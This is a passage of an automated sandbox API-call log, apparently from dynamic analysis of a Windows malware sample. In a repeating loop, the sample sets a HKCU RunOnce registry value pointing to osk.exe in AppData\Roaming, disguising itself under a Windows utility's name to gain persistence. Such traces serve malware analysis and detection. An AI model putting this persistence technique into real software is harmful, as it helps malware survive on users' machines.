perrinfo=0x0) returned 0x0 [0080.910] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.910] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.910] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.910] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.911] RegCloseKey (hKey=0x280) returned 0x0 [0080.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.911] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.911] SetTimer (hWnd=0x20280, nIDEvent=0x2095, uElapse=0xa, lpTimerFunc=0x0) returned 0x2095 [0080.911] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.923] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.923] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.924] KillTimer (hWnd=0x20280, uIDEvent=0x2095) returned 1 [0080.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.924] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.924] IUnknown:Release (This=0x787518) returned 0x1 [0080.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.924] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.924] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.924] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.924] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.925] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0080.925] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.925] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1b [0080.925] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.926] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0080.926] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.926] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.926] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.926] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.926] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.927] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.927] RegCloseKey (hKey=0x280) returned 0x0 [0080.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.927] SetTimer (hWnd=0x20280, nIDEvent=0x2096, uElapse=0xa, lpTimerFunc=0x0) returned 0x2096 [0080.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.938] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.938] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.938] KillTimer (hWnd=0x20280, uIDEvent=0x2096) returned 1 [0080.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.939] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.939] IUnknown:Release (This=0x787518) returned 0x1 [0080.939] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.939] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.939] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.939] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.939] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0080.940] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.940] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1c [0080.940] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.940] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0080.941] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.941] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.941] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.941] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.941] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.941] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.941] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.942] RegCloseKey (hKey=0x280) returned 0x0 [0080.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.942] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.942] SetTimer (hWnd=0x20280, nIDEvent=0x2097, uElapse=0xa, lpTimerFunc=0x0) returned 0x2097 [0080.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.954] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.954] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.954] KillTimer (hWnd=0x20280, uIDEvent=0x2097) returned 1 [0080.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.955] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.955] IUnknown:Release (This=0x787518) returned 0x1 [0080.955] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.955] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.955] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.955] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.956] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.956] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0080.956] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.956] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1d [0080.956] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, 